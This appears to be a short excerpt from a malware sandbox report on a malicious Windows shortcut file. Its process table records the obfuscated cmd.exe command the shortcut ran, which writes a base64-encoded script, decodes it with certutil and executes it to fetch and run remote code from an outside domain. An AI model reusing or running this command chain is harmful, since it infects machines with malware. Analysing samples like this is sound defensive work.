Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
WNKpB6SXkg.lnk
|
MS Windows shortcut, Item id list present, Has Working directory, Has command line arguments, Archive, ctime=Sun Dec 31 23:06:32
1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
|
initial sample
|
||
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /V/D/c md C: 58H8S5\>nul 2>&1 &&s^eT RYED=C: 58H8S5\^E58H8S5.^jS&&echo dmFyIEM5ZWc9InNjIisiciI7RDllZz0iaXAiKyJ0OmgiO0U5ZWc9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDOWVnK0Q5ZWcrRTllZysiLy9lY2VpZTYuc2FvYnJhc3R1cmJpbGhhb2Nvc21lLmNvbS8/MS8iKTs=>!RYED!&&cErtUtil
-f -dEco^de !RYED! !RYED!&&ca^ll !RYED!
|